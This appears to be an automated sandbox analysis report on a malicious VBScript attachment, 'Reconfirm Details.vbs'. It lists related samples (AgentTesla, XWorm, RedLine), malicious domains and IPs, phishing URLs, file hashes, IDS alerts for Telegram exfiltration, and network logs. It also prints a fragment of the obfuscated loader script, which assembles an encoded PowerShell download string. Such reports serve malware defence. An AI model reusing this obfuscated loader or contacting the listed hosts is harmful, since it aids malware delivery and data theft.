                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              bg.microsoft.map.fastly.nethttp://rum.browser-intake-foxbusiness.com:443Get hashmaliciousUnknownBrowse
                                                                                                                              • 199.232.214.172
                                                                                                                              SecuriteInfo.com.Win32.CrypterX-gen.1582.25294.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                                                                                              • 199.232.210.172
                                                                                                                              ScreenConnect.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                              • 199.232.210.172
                                                                                                                              6W9hpMEmjY.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 199.232.214.172
                                                                                                                              6W9hpMEmjY.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 199.232.214.172
                                                                                                                              cncUVRcGoI.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 199.232.210.172
                                                                                                                              https://www.admin-longin.co.jp.mc3lva.cn/Get hashmaliciousUnknownBrowse
                                                                                                                              • 199.232.210.172
                                                                                                                              https://www.longin-eki.co.jp.zurxyjp.cn/Get hashmaliciousUnknownBrowse
                                                                                                                              • 199.232.214.172
                                                                                                                              https://xxnewmac5xx.z13.web.core.windows.net/Get hashmaliciousUnknownBrowse
                                                                                                                              • 199.232.210.172
                                                                                                                              https://windowdefalerts-error0x21916-alert-virus-detected.pages.dev/Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                                                              • 199.232.210.172
                                                                                                                              paste.eeNew order-Docs0374.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.21.84.67
                                                                                                                              gmb.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.21.84.67
                                                                                                                              72625413524.vbsGet hashmaliciousXWormBrowse
                                                                                                                              • 172.67.187.200
                                                                                                                              Purchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 172.67.187.200
                                                                                                                              bZA95up38s.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 104.21.84.67
                                                                                                                              mWimHae6l9.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 172.67.187.200
                                                                                                                              UmJMWJPQ9h.exeGet hashmaliciousXWormBrowse
                                                                                                                              • 172.67.187.200
                                                                                                                              GPgMeqI8Gy.exeGet hashmaliciousXWormBrowse
                                                                                                                              • 104.21.84.67
                                                                                                                              E3XzKxHCCb.exeGet hashmaliciousXWormBrowse
                                                                                                                              • 172.67.187.200
                                                                                                                              mWimHae6l9.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.21.84.67
                                                                                                                              api.telegram.orgexplorer.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              X1.exeGet hashmaliciousXWormBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              X2.exeGet hashmaliciousXWormBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              HS202410407 Elemento de proyecto MSMU5083745.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              gmb.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              z1E-catalogSamples.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              z0LTqIdZ4A.exeGet hashmaliciousXWormBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              uploaddeimagens.com.brgmb.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.21.45.138
                                                                                                                              72625413524.vbsGet hashmaliciousXWormBrowse
                                                                                                                              • 172.67.215.45
                                                                                                                              Purchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 172.67.215.45
                                                                                                                              bZA95up38s.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 104.21.45.138
                                                                                                                              SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                                                                                                              • 172.67.215.45
                                                                                                                              SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 104.21.45.138
                                                                                                                              Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                                                                                                              • 172.67.215.45
                                                                                                                              eInvoicing_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                                              • 104.21.45.138
                                                                                                                              F723838674.vbsGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.21.45.138
                                                                                                                              Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                                              • 104.21.45.138
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              TELEGRAMRUX1.exeGet hashmaliciousXWormBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              X2.exeGet hashmaliciousXWormBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              HS202410407 Elemento de proyecto MSMU5083745.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              gmb.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              SecuriteInfo.com.Trojan.Nekark.22288.17032.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 149.154.167.99
                                                                                                                              https://telegrambot-fix.pages.dev/bot.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 149.154.167.99
                                                                                                                              http://telegrambot-fix.pages.dev/waysinGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 149.154.167.99
                                                                                                                              z1E-catalogSamples.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              CLOUDFLARENETUSRemittance-Advice.docGet hashmaliciousUnknownBrowse
                                                                                                                              • 172.67.175.222
                                                                                                                              shipping docs.docGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.21.74.191
                                                                                                                              Invoice.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 172.67.134.136
                                                                                                                              Pedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                              • 172.67.152.117
                                                                                                                              purchase order pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 104.26.12.205
                                                                                                                              PO 23JC0704-Rollease-B.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 104.26.13.205
                                                                                                                              UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                              • 104.21.65.24
                                                                                                                              BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 172.67.74.152
                                                                                                                              SecuriteInfo.com.Python.Stealer.1437.14994.32063.exeGet hashmaliciousPython StealerBrowse
                                                                                                                              • 172.67.74.152
                                                                                                                              3CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                              • 172.67.139.220
                                                                                                                              ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdINPurchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 103.83.81.68
                                                                                                                              DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 103.83.81.68
                                                                                                                              Price Quotation_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 103.83.81.68
                                                                                                                              DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 103.83.81.68
                                                                                                                              BBL ADVICE FOR INWARD_BC I650120-000_04012024.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 103.83.81.68
                                                                                                                              EUR 17252,8 20240403.vbsGet hashmaliciousRemcosBrowse
                                                                                                                              • 103.83.81.68
                                                                                                                              0458319438.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                              • 103.92.235.178
                                                                                                                              PO No- 24410083007.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                              • 103.92.235.178
                                                                                                                              CtEeMS3H62.exeGet hashmaliciousAmadey, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Stealc, VidarBrowse
                                                                                                                              • 103.93.17.162
                                                                                                                              Wunuxnati.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                              • 103.92.235.178
                                                                                                                              CLOUDFLARENETUSRemittance-Advice.docGet hashmaliciousUnknownBrowse
                                                                                                                              • 172.67.175.222
                                                                                                                              shipping docs.docGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.21.74.191
                                                                                                                              Invoice.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 172.67.134.136
                                                                                                                              Pedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                              • 172.67.152.117
                                                                                                                              purchase order pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 104.26.12.205
                                                                                                                              PO 23JC0704-Rollease-B.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 104.26.13.205
                                                                                                                              UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                              • 104.21.65.24
                                                                                                                              BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 172.67.74.152
                                                                                                                              SecuriteInfo.com.Python.Stealer.1437.14994.32063.exeGet hashmaliciousPython StealerBrowse
                                                                                                                              • 172.67.74.152
                                                                                                                              3CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                              • 172.67.139.220
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              1138de370e523e824bbca92d049a3777https://www.admin-longin.co.jp.mc3lva.cn/Get hashmaliciousUnknownBrowse
                                                                                                                              • 23.1.237.91
                                                                                                                              https://www.longin.co.jp.wiibhaq.cn/Get hashmaliciousUnknownBrowse
                                                                                                                              • 23.1.237.91
                                                                                                                              https://emv1.3rujia.cn/Get hashmaliciousUnknownBrowse
                                                                                                                              • 23.1.237.91
                                                                                                                              https://wmicrosouab-4ba8.udydzj.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 23.1.237.91
                                                                                                                              https://uqgekpc20qn1.azureedge.net/6466/Get hashmaliciousTechSupportScamBrowse
                                                                                                                              • 23.1.237.91
                                                                                                                              https://magnisteel.lk/4765445b-32c6-49b0-83e6-1d93765276ca.phpGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 23.1.237.91
                                                                                                                              https://netorg442802-my.sharepoint.com/:b:/g/personal/darek_daronto_com/EeXtnEaZ3XJBqGk13it6odUB-K9vuYAC7zp7SfyciZ3BpQ?e=nkKu2wGet hashmaliciousUnknownBrowse
                                                                                                                              • 23.1.237.91
                                                                                                                              https://lithiuimvalley.com/ssdGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                              • 23.1.237.91
                                                                                                                              https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DlLb9_7VBE-2BPKrWdDFE8TeQU0FNoYmRNt3BbsAfHCQfpyMVcUv91cWM1GbR6tMnpfVZqwoeCii1Z-2FHB6Wp4CGi-2FJ4Nq2flvhbRyRKwbWUqyssDslf87wBQZbBQ0EZsTXlvzjuj1ZnarL4QCJJlvUup-2FiM-2F9GPG6X3nhhKKp6sQ0v-2BBs5Jrrpzc3e5B2aUKKEJUx1Hjrx3xc16wmpK1HmM2sLiNIweMaJlJ9frDis7-2BK565mLw-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 23.1.237.91
                                                                                                                              https://webmail.cmxserver.com/authsecure/index.php?email=kaylen@virtualintelligencebriefing.comGet hashmaliciousUnknownBrowse
                                                                                                                              • 23.1.237.91
                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0epurchase order pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 103.83.81.68
                                                                                                                              • 172.67.215.45
                                                                                                                              PO 23JC0704-Rollease-B.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 103.83.81.68
                                                                                                                              • 172.67.215.45
                                                                                                                              3Shape Unite Installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 103.83.81.68
                                                                                                                              • 172.67.215.45
                                                                                                                              ScreenConnect.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 103.83.81.68
                                                                                                                              • 172.67.215.45
                                                                                                                              ScreenConnect.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 103.83.81.68
                                                                                                                              • 172.67.215.45
                                                                                                                              X1.exeGet hashmaliciousXWormBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 103.83.81.68
                                                                                                                              • 172.67.215.45
                                                                                                                              Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 103.83.81.68
                                                                                                                              • 172.67.215.45
                                                                                                                              X2.exeGet hashmaliciousXWormBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 103.83.81.68
                                                                                                                              • 172.67.215.45
                                                                                                                              BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 103.83.81.68
                                                                                                                              • 172.67.215.45
                                                                                                                              https://www.admin-longin.co.jp.mc3lva.cn/Get hashmaliciousUnknownBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 103.83.81.68
                                                                                                                              • 172.67.215.45
                                                                                                                              37f463bf4616ecd445d4a1937da06e19#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.21.84.67
                                                                                                                              181_960.msiGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.21.84.67
                                                                                                                              UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                              • 104.21.84.67
                                                                                                                              3CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                              • 104.21.84.67
                                                                                                                              mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                              • 104.21.84.67
                                                                                                                              JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                              • 104.21.84.67
                                                                                                                              AaIo4VGgvO.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                              • 104.21.84.67
                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                              • 104.21.84.67
                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                              • 104.21.84.67
                                                                                                                              768.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.21.84.67
                                                                                                                              No context
                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (11914), with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):14100
                                                                                                                              Entropy (8bit):4.847137850881404
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:ilgPZhVo4D4DgRfU0TId+m8qG7eu3T3JGH+uKRYXVpPgRFVNRb/Qvo:TV9sERffIgXqGCu3T3JVxKVObDl
                                                                                                                              MD5:7418B4E7D60F374D3282A97D3DF04C97
                                                                                                                              SHA1:A40628B184F09E7E6AE6314B154592609FFF741D
                                                                                                                              SHA-256:1C5BC9DA0B5EAA9D08981AFEAB7FCF0956D3CF618F97F19F5A9A76E83880C0BB
                                                                                                                              SHA-512:470508E9805FBFD99D103A42927F19AFCF5E803FBF697F356851A5EA78B5AA575D9CCBF4DC66BDB349F9E3B68235D805D82F7B1FC6C452E35E9E3823E32B1634
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:.. dim chammeante , carpinseira , excusar , illuminativo , litoglifia , Cama , litoglifia1.. carpinseira = " ".. excusar = "" & illuminativo & carpinseira & illuminativo & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & illuminativo & carpinseira & illuminativo & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & illuminativo & carpinseira & illuminativo & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & illuminativo & carpinseira & illuminativo & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & illuminativo & carpinseira & illuminativo & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & illuminativo & carpinseira
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):64
                                                                                                                              Entropy (8bit):1.1940658735648508
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Nlllul774/lL:NllUwt
                                                                                                                              MD5:3BD40D4BDD7802424FE8F2DC2A41C196
                                                                                                                              SHA1:88F355EA9D58C5A00B2EBB0DC3127C0C13052631
                                                                                                                              SHA-256:FCF55501F03C9B5E24796B8FE3656143E97D7A5FD0300387C1960C226C74076A
                                                                                                                              SHA-512:67734D54D327379C259DB7E0576BE2A4B597CB2F0B9E881AA1FC2B55F375BB5862122579B0B5EC7DED7A7875C2AC7668033355772CBB8311A8A86924153D59B2
                                                                                                                              Malicious:false
                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                              Preview:@...e................................................@..........
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              File type:Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
                                                                                                                              Entropy (8bit):3.7430371403826075
                                                                                                                              TrID:
                                                                                                                              • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                                                                              • MP3 audio (1001/1) 32.22%
                                                                                                                              • Lumena CEL bitmap (63/63) 2.03%
                                                                                                                              • Corel Photo Paint (41/41) 1.32%
                                                                                                                              File name:Reconfirm Details.vbs
                                                                                                                              File size:88'460 bytes
                                                                                                                              MD5:0a5a39c1f5e6f3995906a7a7829b5022
                                                                                                                              SHA1:b469f4de7da98dc2e8fdfeb4de8e9e3e62fa28e9
                                                                                                                              SHA256:123a63013a4dcff0add31ab4234ea1894fc33b1797c8c2c58b9ae7b8419094a0
                                                                                                                              SHA512:17deee877b2e3efaa96be4e31afc60ef4a6154fa63d81e63e5095782fd9522470cb4170b827afbdfb8e7e72e257d8f6c385b557e562d70a2e3c2caa2cc5f4d87
                                                                                                                              SSDEEP:1536:vB52XTIU1lBHFcJUJI+YZb5bJ9Gmgz/+rtfRDFqz:v7U1DHFUGmgURDFs
                                                                                                                              TLSH:8983AD1267FA1208F5F76B88A97611744B37BD9AA97DC64C05CC290D0FF3E908825BB7
                                                                                                                              File Content Preview:.......... . . . .o.n. .e.r.r.o.r. .r.e.s.u.m.e. .n.e.x.t......... . . . .d.i.m. .c.e.l.t.a.s..... . . . .d.i.m. .p.e.t.a.u.r.i.s.t.a..... . . . .d.i.m. .o.P.a.r.a.m.D.i.c.t......... . . . .'..... . . . .'. .A.b.o.r.t. .i.f. .t.h.e. .h.o.s.t. .i.s. .n.o.t
                                                                                                                              Icon Hash:68d69b8f86ab9a86
                                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                              04/24/24-06:48:30.121310TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49710443192.168.2.5149.154.167.220
                                                                                                                              04/24/24-06:48:26.753916TCP2020423ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M144349707103.83.81.68192.168.2.5
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Apr 24, 2024 06:48:06.994963884 CEST49674443192.168.2.523.1.237.91
                                                                                                                              Apr 24, 2024 06:48:06.994963884 CEST49675443192.168.2.523.1.237.91
                                                                                                                              Apr 24, 2024 06:48:07.135582924 CEST49673443192.168.2.523.1.237.91
                                                                                                                              Apr 24, 2024 06:48:11.774785042 CEST49704443192.168.2.5104.21.84.67
                                                                                                                              Apr 24, 2024 06:48:11.774835110 CEST44349704104.21.84.67192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:11.774982929 CEST49704443192.168.2.5104.21.84.67
                                                                                                                              Apr 24, 2024 06:48:11.782380104 CEST49704443192.168.2.5104.21.84.67
                                                                                                                              Apr 24, 2024 06:48:11.782401085 CEST44349704104.21.84.67192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:12.117150068 CEST44349704104.21.84.67192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:12.117295027 CEST49704443192.168.2.5104.21.84.67
                                                                                                                              Apr 24, 2024 06:48:12.165817976 CEST49704443192.168.2.5104.21.84.67
                                                                                                                              Apr 24, 2024 06:48:12.165847063 CEST44349704104.21.84.67192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:12.166146040 CEST44349704104.21.84.67192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:12.166225910 CEST49704443192.168.2.5104.21.84.67
                                                                                                                              Apr 24, 2024 06:48:12.168380022 CEST49704443192.168.2.5104.21.84.67
                                                                                                                              Apr 24, 2024 06:48:12.216110945 CEST44349704104.21.84.67192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:12.761953115 CEST44349704104.21.84.67192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:12.762010098 CEST44349704104.21.84.67192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:12.762027025 CEST49704443192.168.2.5104.21.84.67
                                                                                                                              Apr 24, 2024 06:48:12.762034893 CEST44349704104.21.84.67192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:12.762056112 CEST44349704104.21.84.67192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:12.762073994 CEST49704443192.168.2.5104.21.84.67
                                                                                                                              Apr 24, 2024 06:48:12.762089014 CEST44349704104.21.84.67192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:12.762106895 CEST49704443192.168.2.5104.21.84.67
                                                                                                                              Apr 24, 2024 06:48:12.762110949 CEST44349704104.21.84.67192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:12.762125015 CEST49704443192.168.2.5104.21.84.67
                                                                                                                              Apr 24, 2024 06:48:12.762145042 CEST49704443192.168.2.5104.21.84.67
                                                                                                                              Apr 24, 2024 06:48:12.762147903 CEST44349704104.21.84.67192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:12.762186050 CEST49704443192.168.2.5104.21.84.67
                                                                                                                              Apr 24, 2024 06:48:12.762188911 CEST44349704104.21.84.67192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:12.762228012 CEST49704443192.168.2.5104.21.84.67
                                                                                                                              Apr 24, 2024 06:48:12.834166050 CEST44349704104.21.84.67192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:12.834249973 CEST49704443192.168.2.5104.21.84.67
                                                                                                                              Apr 24, 2024 06:48:12.834275007 CEST44349704104.21.84.67192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:12.834321022 CEST49704443192.168.2.5104.21.84.67
                                                                                                                              Apr 24, 2024 06:48:12.834352016 CEST44349704104.21.84.67192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:12.834394932 CEST49704443192.168.2.5104.21.84.67
                                                                                                                              Apr 24, 2024 06:48:12.834398985 CEST44349704104.21.84.67192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:12.834462881 CEST49704443192.168.2.5104.21.84.67
                                                                                                                              Apr 24, 2024 06:48:12.834778070 CEST44349704104.21.84.67192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:12.834826946 CEST49704443192.168.2.5104.21.84.67
                                                                                                                              Apr 24, 2024 06:48:12.834837914 CEST44349704104.21.84.67192.168.2.5
